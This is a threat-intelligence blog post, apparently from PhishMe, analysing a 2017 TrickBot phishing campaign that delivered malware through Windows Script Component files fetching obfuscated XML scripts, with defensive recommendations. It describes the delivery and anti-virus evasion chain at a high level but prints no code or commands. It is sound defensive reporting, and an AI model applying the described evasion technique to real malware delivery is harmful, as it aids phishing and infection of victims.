Threat actors’ consistent pursuit of improved efficiency is a key characteristic of the phishing threat landscape. One method for improving efficiency is to use a unique delivery technique that not only allows threat actors to distribute malware but also succeeds in evading anti-virus software and technologies.
PhishMe Intelligence™ recently observed a change in the delivery of the TrickBot financial crimes and botnet malware. The new technique uses a Windows Script Component (WSC) that contains XML-format scripts to leverage the delivery of a malware payload. Not only does this technique make the payload delivery more complex, it also allows for more flexibility for obfuscation and anti-virus evasion.
Although the delivery of the TrickBot malware has been associated with a number of delivery applications and techniques such as macro scripting in Microsoft Office documents, this recent implementation showcases a unique development in malware-distribution mechanisms. First reported by PhishMe Intelligence on 21 July 2017, this technique was observed in a TrickBot analysis that used a WSC as the malware’s initial delivery mechanism. The phishing messages associated with the analysis fraudulently impersonated the Horizon brand, possibly targeting United Kingdom residents. A WSC file is tiny in size because it only contains a set of instructions wrapped within an XML-format script for obtaining additional commands (Figure 1).
Once the instructions for the additional XML script have been retrieved, the second file (Figure 2) provides information about the malware’s payload locations, as well as instructions for de-obfuscating the malware binary.
Although this behavior has been observed in four PhishMe Intelligence analyses, only three of those analyses delivered TrickBot. The fourth delivered the GlobeImposter ransomware. However, this latter campaign was reported by other researchers to have delivered the TrickBot malware earlier in the day on 26 July 2017. Regardless of the intended malware family, the technique implemented in the second script enables threat actors to change payload locations and/or malware families while also making the delivery application resilient to detection. By employing a successful distribution method, threat actors are attempting to take their success using TrickBot – or any malware family – to another level. The added layer of obfuscation in the secondary script allows the application to potentially bypass security controls and anti-virus technologies.
While the delivery of this small, initial WSC script is relatively new to the phishing threat landscape, its use reveals a simplistic yet effective distribution of malicious content to the intended targets. These techniques and methodologies used by threat actors demonstrate the evolution of the phishing threat landscape and should spur security professionals to develop a comprehensive defense against these improvements. The best approach is to combine tactical observations and atomic indicators with a strategic view of threat actors’ goals. Ultimately, defenders should not focus on just one attack vector or malware tool, but instead should anticipate the strategy that threat actors use to accomplish their mission. In many cases, this mission is based upon the success of phishing emails.
Understanding how attackers craft and deploy the messages allows an organization to prepare and empower the email users within their organization. Email users can then engage critically with those messages and, when a suspicious email is detected, report it to the security and incident responders defending the enterprise. These internal reports can then be compared to and combined with external sources to help network defenders overcome threats at a tactical level and apply those tactics as part of a greater strategy to overcome any phishing threat.
Don’t miss another threat – stay on top of emerging phishing and malware threats and attacks, all delivered straight to your inbox completely free. Subscribe to PhishMe® Threat Alerts today.